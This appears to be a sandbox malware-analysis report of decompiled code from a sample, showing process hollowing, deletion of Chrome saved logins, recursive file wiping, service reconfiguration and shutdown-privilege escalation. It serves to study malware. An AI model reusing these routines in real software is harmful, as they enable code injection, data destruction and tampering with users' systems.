                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@G@std@@$G@2@@std@@$D@1@@V01@@$??4?$basic_string@?c_str@?$basic_string@FileFindV01@V?$basic_string@$??9std@@?length@?$basic_string@D@2@@0@FirstG@1@@G@2@@0@Hstd@@NextV10@0@
                                  • String ID:
                                  • API String ID: 3638635289-0
                                  • Opcode ID: fb7e7f8a23c4865ccf3e554ece68bd99fc057a5f5f51279deb56dd3fe4515c10
                                  • Instruction ID: 5773dbc557d9876992c7e48c4d97bf12bb9d98964626974f027bca1071927927
                                  • Opcode Fuzzy Hash: fb7e7f8a23c4865ccf3e554ece68bd99fc057a5f5f51279deb56dd3fe4515c10
                                  • Instruction Fuzzy Hash: E641FB7290050DEBCB04ABA0DC49DEEBB7CEB94355F404166F512E30A0EF745689CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0040F219() {
                                  				void* _t59;
                                  				void* _t60;
                                  				void _t71;
                                  				void* _t72;
                                  				signed int _t74;
                                  				CONTEXT* _t80;
                                  				intOrPtr _t85;
                                  				intOrPtr* _t93;
                                  				signed int _t95;
                                  				void* _t100;
                                  				CONTEXT* _t110;
                                  				struct _PROCESS_INFORMATION* _t114;
                                  				void* _t115;
                                  				void* _t117;
                                  
                                  				L00413ECA();
                                  				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
                                  				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
                                  				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
                                  				_t59 =  *(_t115 + 0xc);
                                  				 *(_t115 - 0x74) = _t59;
                                  				if( *_t59 != 0x5a4d) {
                                  					L16:
                                  					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
                                  					_t60 = 0;
                                  				} else {
                                  					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
                                  					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
                                  					if( *_t93 != 0x4550) {
                                  						goto L16;
                                  					} else {
                                  						_t95 = 0x11;
                                  						memset(_t115 - 0x60, 0, _t95 << 2);
                                  						_t114 =  *(_t115 + 0x10);
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  						if(CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114) == 0) {
                                  							goto L16;
                                  						} else {
                                  							_t110 = VirtualAlloc(0, 4, 0x1000, 4);
                                  							 *(_t115 - 0x70) = _t110;
                                  							_t110->ContextFlags = 0x10007;
                                  							if(GetThreadContext(_t114->hThread, _t110) == 0 || ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0) == 0) {
                                  								goto L16;
                                  							} else {
                                  								_t71 =  *(_t115 - 0x1c);
                                  								if(_t71 ==  *(_t93 + 0x34)) {
                                  									 *((intOrPtr*)(_t115 - 0x78))(_t114->hProcess, _t71);
                                  								}
                                  								_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40);
                                  								 *(_t115 - 0x6c) = _t72;
                                  								if(_t72 == 0 || WriteProcessMemory(_t114->hProcess, _t72,  *(_t115 + 0xc),  *(_t93 + 0x54), 0) == 0) {
                                  									goto L16;
                                  								} else {
                                  									_t74 = 0;
                                  									 *(_t115 - 0x64) = 0;
                                  									while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
                                  										_t100 =  *(_t115 + 0xc);
                                  										_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
                                  										 *((intOrPtr*)(_t115 - 0x68)) = _t85;
                                  										WriteProcessMemory(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *(_t85 + 0x10), 0);
                                  										 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
                                  										_t74 =  *(_t115 - 0x64);
                                  									}
                                  									if(WriteProcessMemory( *_t114,  *(_t115 - 0x70)->Ebx + 8, _t93 + 0x34, 4, 0) == 0) {
                                  										goto L16;
                                  									} else {
                                  										_t80 =  *(_t115 - 0x70);
                                  										_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
                                  										if(SetThreadContext(_t114->hThread, _t80) == 0 || ResumeThread(_t114->hThread) == 0xffffffff) {
                                  											goto L16;
                                  										} else {
                                  											_t60 = 1;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
                                  				return _t60;
                                  			}
                                  Address column of the listing above, in order: 0x0040f21e, 0x0040f229, 0x0040f22c, 0x0040f247, 0x0040f24a, 0x0040f24d, 0x0040f255, 0x0040f3c7, 0x0040f3c7, 0x0040f3cb, 0x0040f25b, 0x0040f25e, 0x0040f260, 0x0040f269, 0x00000000, 0x0040f26f, 0x0040f271, 0x0040f277, 0x0040f279, 0x0040f27e, 0x0040f27f, 0x0040f280, 0x0040f281, 0x0040f29c, 0x00000000, 0x0040f2a2, 0x0040f2b2, 0x0040f2b4, 0x0040f2b7, 0x0040f2c9, 0x00000000, 0x0040f2f1, 0x0040f2f1, 0x0040f2f7, 0x0040f2fc, 0x0040f2fc, 0x0040f30e, 0x0040f314, 0x0040f319, 0x00000000, 0x0040f33a, 0x0040f33a, 0x0040f33c, 0x0040f33f, 0x0040f34a, 0x0040f353, 0x0040f35a, 0x0040f371, 0x0040f373, 0x0040f376, 0x0040f376, 0x0040f396, 0x00000000, 0x0040f398, 0x0040f39e, 0x0040f3a1, 0x0040f3b3, 0x00000000, 0x0040f3c3, 0x0040f3c3, 0x0040f3c3, 0x0040f3b3, 0x0040f396, 0x0040f319, 0x0040f2c9, 0x0040f29c, 0x0040f269, 0x0040f3d0, 0x0040f3db

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 0040F21E
                                  • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,73BCF560), ref: 0040F23A
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040F241
                                  • CreateProcessW.KERNEL32 ref: 0040F294
                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,73BCF560), ref: 0040F2AC
                                  • GetThreadContext.KERNEL32(?,00000000,?,00000000,73BCF560), ref: 0040F2C1
                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F2E3
                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,73BCF560), ref: 0040F30E
                                  • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,73BCF560), ref: 0040F330
                                  • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,73BCF560), ref: 0040F371
                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F392
                                  • SetThreadContext.KERNEL32(?,?,?,00000000,73BCF560), ref: 0040F3AB
                                  • ResumeThread.KERNEL32(?,?,00000000,73BCF560), ref: 0040F3B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                  • API String ID: 65594003-1050664331
                                  • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction ID: 14082434b540fb9a952e0d1072ae94245c422bc39d8110babfce67740ad62d51
                                  • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction Fuzzy Hash: 0E513A71A00204EFDB219F64CC85FAABBB9FF84710F20407AE914EB2A1D775E815CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 32%
                                  			E0040710F() {
                                  				char _v5;
                                  				char _v6;
                                  				char _v24;
                                  				void* _v40;
                                  				char* _t12;
                                  				CHAR* _t13;
                                  				long _t20;
                                  				char* _t21;
                                  				void* _t25;
                                  
                                  				_t12 = getenv("UserProfile");
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                                  				_t13 =  &_v24;
                                  				L00414170();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				if(DeleteFileA(_t13) != 0) {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
                                  					E00407A90("\n[Chrome StoredLogins found, cleared!]");
                                  					_t25 = 1;
                                  					L8:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return _t25;
                                  				}
                                  				_t20 = GetLastError();
                                  				if(_t20 == 0) {
                                  					_t21 =  &_v6;
                                  					L5:
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
                                  					E00407A90("\n[Chrome StoredLogins not found]");
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return 1;
                                  				}
                                  				if(_t20 == 1) {
                                  					_t21 =  &_v5;
                                  					goto L5;
                                  				}
                                  				_t25 = 0;
                                  				goto L8;
                                  			}
                                  Address column of the listing above, in order: 0x00407124, 0x0040712f, 0x00407136, 0x0040713a, 0x00407145, 0x0040714e, 0x0040715d, 0x004071b1, 0x004071b7, 0x004071bf, 0x004071c1, 0x004071c4, 0x00000000, 0x004071ca, 0x00407166, 0x00407167, 0x0040719c, 0x00407178, 0x0040717e, 0x00407184, 0x0040718f, 0x00000000, 0x00407195, 0x0040716a, 0x00407173, 0x00000000, 0x00407176, 0x0040716c, 0x00000000

                                  APIs
                                  • getenv.MSVCRT ref: 00407124
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040712F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040713A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407145
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040714E
                                  • DeleteFileA.KERNEL32(00000000), ref: 00407155
                                  • GetLastError.KERNEL32 ref: 0040715F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 0040717E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040718F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 004071B1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071C4
                                  Strings
                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407119
                                  • [Chrome StoredLogins not found], xrefs: 00407179
                                  • [Chrome StoredLogins found, cleared!], xrefs: 004071AC
                                  • UserProfile, xrefs: 0040711F
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  • API String ID: 3740952235-1062637481
                                  • Opcode ID: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                  • Instruction ID: 31ca8e98cb087ed4ee3b22d3c36486bbccf77f9584d8598ce9e7038f5dc1f740
                                  • Opcode Fuzzy Hash: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                  • Instruction Fuzzy Hash: 51118475904509EBCB00BBE0ED4E9FE7738DA547417504036E812E32E1EA796A45CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412BEE(wchar_t* _a4) {
                                  				signed char _v5;
                                  				void* _v12;
                                  				short _v532;
                                  				long _v1052;
                                  				struct _WIN32_FIND_DATAW _v1644;
                                  				void* _t46;
                                  
                                  				wcscpy( &_v1052, _a4);
                                  				wcscat( &_v1052, L"\\*");
                                  				wcscpy( &_v532, _a4);
                                  				wcscat( &_v532, "\\");
                                  				_t46 = FindFirstFileW( &_v1052,  &_v1644);
                                  				_v12 = _t46;
                                  				if(_t46 == 0xffffffff) {
                                  					L18:
                                  					return 0;
                                  				}
                                  				wcscpy( &_v1052,  &_v532);
                                  				_v5 = 1;
                                  				do {
                                  					if(FindNextFileW(_v12,  &_v1644) == 0) {
                                  						if(GetLastError() != 0x12) {
                                  							L17:
                                  							FindClose(_v12);
                                  							goto L18;
                                  						}
                                  						_v5 = _v5 & 0x00000000;
                                  						goto L14;
                                  					}
                                  					if(E00412BBA( &(_v1644.cFileName)) != 0) {
                                  						goto L14;
                                  					}
                                  					wcscat( &_v532,  &(_v1644.cFileName));
                                  					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
                                  						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
                                  							SetFileAttributesW( &_v532, 0x80);
                                  						}
                                  						if(DeleteFileW( &_v532) == 0) {
                                  							goto L17;
                                  						} else {
                                  							L7:
                                  							wcscpy( &_v532,  &_v1052);
                                  							goto L14;
                                  						}
                                  					}
                                  					if(E00412BEE( &_v532) == 0) {
                                  						goto L17;
                                  					}
                                  					RemoveDirectoryW( &_v532);
                                  					goto L7;
                                  					L14:
                                  				} while (_v5 != 0);
                                  				FindClose(_v12);
                                  				return RemoveDirectoryW(_a4);
                                  			}
                                  Address column of the listing above, in order: 0x00412c0a, 0x00412c1e, 0x00412c2a, 0x00412c38, 0x00412c4b, 0x00412c54, 0x00412c57, 0x00412d52, 0x00000000, 0x00412d52, 0x00412c6b, 0x00412c75, 0x00412c79, 0x00412c8b, 0x00412d26, 0x00412d49, 0x00412d4c, 0x00000000, 0x00412d4c, 0x00412d28, 0x00000000, 0x00412d28, 0x00412ca0, 0x00000000, 0x00000000, 0x00412cb4, 0x00412cbf, 0x00412cf6, 0x00412d04, 0x00412d04, 0x00412d19, 0x00000000, 0x00412d1b, 0x00412cdb, 0x00412ce9, 0x00000000, 0x00412cec, 0x00412d19, 0x00412cd0, 0x00000000, 0x00000000, 0x00412cd9, 0x00000000, 0x00412d2c, 0x00412d2c, 0x00412d39, 0x00000000

                                  APIs
                                  • wcscpy.MSVCRT ref: 00412C0A
                                  • wcscat.MSVCRT ref: 00412C1E
                                  • wcscpy.MSVCRT ref: 00412C2A
                                  • wcscat.MSVCRT ref: 00412C38
                                  • FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                  • wcscpy.MSVCRT ref: 00412C6B
                                  • FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                  • wcscat.MSVCRT ref: 00412CB4
                                  • wcscpy.MSVCRT ref: 00412CE9
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00412D04
                                  • DeleteFileW.KERNEL32(?), ref: 00412D11
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                  • GetLastError.KERNEL32 ref: 00412D1D
                                  • FindClose.KERNEL32(004085F5), ref: 00412D39
                                  • RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                  • FindClose.KERNEL32(004085F5), ref: 00412D4C
                                    • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BCC
                                    • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BDC
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileFindwcscpy$wcscat$CloseDirectoryRemovewcscmp$AttributesDeleteErrorFirstLastNext
                                  • String ID:
                                  • API String ID: 520940213-0
                                  • Opcode ID: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                  • Instruction ID: fb5d4b3d5d58ecc2c3d6dfc175ce5965a41efe56bc0731aa74bc7a01e785bf8c
                                  • Opcode Fuzzy Hash: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                  • Instruction Fuzzy Hash: BE415E72C0421CAADF21DBA0DD88FDE7BBDAF44304F1445A6E504E2050EBB59AD5CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 48%
                                  			E00411927(void* _a4, signed char _a20) {
                                  				short* _t6;
                                  				signed int _t9;
                                  				void* _t14;
                                  				short* _t17;
                                  				int _t19;
                                  				void* _t21;
                                  				void* _t22;
                                  
                                  				_t17 = 0;
                                  				_t6 = OpenSCManagerW(0, 0, 2);
                                  				_t22 = _t6;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t21 = OpenServiceW(_t22, _t6, 2);
                                  				if(_t21 != 0) {
                                  					_t19 =  &_a4 | 0xffffffff;
                                  					_t9 = _a20 & 0x000000ff;
                                  					if(_t9 == 0) {
                                  						_push(4);
                                  						goto L8;
                                  					} else {
                                  						_t14 = _t9 - 1;
                                  						if(_t14 == 0) {
                                  							_push(2);
                                  							goto L8;
                                  						} else {
                                  							if(_t14 == 1) {
                                  								_push(3);
                                  								L8:
                                  								_pop(_t19);
                                  							}
                                  						}
                                  					}
                                  					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
                                  					CloseServiceHandle(_t22);
                                  					CloseServiceHandle(_t21);
                                  				} else {
                                  					CloseServiceHandle(_t22);
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t17;
                                  			}
                                  Address column of the listing above, in order: 0x0041192d, 0x00411933, 0x0041193e, 0x00411940, 0x0041194e, 0x00411952, 0x00411961, 0x00411964, 0x00411966, 0x00411976, 0x00000000, 0x00411968, 0x00411968, 0x00411969, 0x00411972, 0x00000000, 0x0041196b, 0x0041196c, 0x0041196e, 0x00411978, 0x00411978, 0x00411978, 0x0041196c, 0x00411969, 0x00411995, 0x00411998, 0x0041199b, 0x00411954, 0x00411955, 0x00411955, 0x004119a0, 0x004119ac

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00410FD9), ref: 00411986
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411998
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 0041199B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                  • String ID:
                                  • API String ID: 760094045-0
                                  • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction ID: c2fa0ded83cb97236bb08be5de2499f982cdcb79c4471a71361dcbc3e7912862
                                  • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction Fuzzy Hash: 2201D2B1120528BAE6001B709C99EFB3F5CEF453B0B044226F632961E0CA644D81C9E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                   			E00411700(void* _a4) {                      // start a service by name; _a4 is a std::wstring holding the name
                                   				short* _t5;
                                   				signed int _t12;
                                   				void* _t15;
                                   				void* _t16;
                                   
                                   				_t12 = 0;
                                   				_t5 = OpenSCManagerW(0, 0, 0x10);         // local SCM, active services database
                                   				_t16 = _t5;
                                   				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();   // service name from the wstring argument
                                   				_t15 = OpenServiceW(_t16, _t5, 0x10);     // 0x10 == SERVICE_START
                                   				if(_t15 != 0) {
                                   					_t12 = 0 | StartServiceW(_t15, 0, 0) != 0x00000000;   // result: 1 if StartServiceW succeeded, else 0
                                   					CloseServiceHandle(_t16);
                                   					CloseServiceHandle(_t15);
                                   				} else {
                                   					CloseServiceHandle(_t16);               // service could not be opened: only the SCM handle is released
                                   				}
                                   				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();   // wstring destructor
                                   				return _t12;
                                   			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,0041B310,?,?,0041130D), ref: 0041170C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000010,?,?,0041130D), ref: 00411719
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,0041130D), ref: 00411721
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041172E
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041130D), ref: 00411739
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174B
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041130D), ref: 00411753
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ManagerStart
                                  • String ID:
                                  • API String ID: 3595611540-0
                                  • Opcode ID: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                  • Instruction ID: 0126697ef4a7dd551ba317b87bbb1749c3aaf445346a94cf1b379eb6c3c08625
                                  • Opcode Fuzzy Hash: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                  • Instruction Fuzzy Hash: 04F06D71110528FFD3106FB1EC88DFF3F6CEE893A47044025F90692160CB749E869AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                   			E0040EC0F() {                               // enable SeShutdownPrivilege in the current process token
                                   				void* _v8;                              // token handle
                                   				intOrPtr _v12;                          // == _v24.Privileges[0].Attributes (the decompiler split the struct)
                                   				struct _TOKEN_PRIVILEGES _v24;
                                   				signed int _t14;
                                   
                                   				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);   // 0x28 == TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
                                   				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));   // LUID into Privileges[0].Luid
                                   				_v24.PrivilegeCount = 1;
                                   				_v12 = 2;                               // SE_PRIVILEGE_ENABLED
                                   				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);   // the privilege ExitWindowsEx needs to shut down or reboot
                                   				_t14 = GetLastError();
                                   				asm("sbb eax, eax");                    // return value is derived from GetLastError(); _v8 is never closed here
                                   				return  ~( ~_t14);
                                   			}

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?,0041B310,?,?,?,?,?,0040DF86), ref: 0040EC1C
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0040DF86), ref: 0040EC23
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040EC35
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040EC54
                                  • GetLastError.KERNEL32 ref: 0040EC5A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 3534403312-3733053543
                                  • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                  • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                   			E00409D02(void** _a4) {                     // locate the "SETTINGS" blob among the module's own resources
                                   				void* _t4;
                                   				long _t5;
                                   				struct HRSRC__* _t7;
                                   
                                   				_t7 = FindResourceA(0, "SETTINGS", 0xa);   // hModule 0 == this image; 0xa == RT_RCDATA
                                   				_t4 = LockResource(LoadResource(0, _t7));  // pointer to the raw resource bytes (no copy is made)
                                   				_t5 = SizeofResource(0, _t7);             // none of the three calls is checked for failure
                                   				 *_a4 = _t4;                            // out: pointer to the blob
                                   				return _t5;                             // return: its size in bytes
                                   			}

                                  APIs
                                  • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                  • LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID: SETTINGS
                                  • API String ID: 3473537107-594951305
                                  • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                  • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%
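
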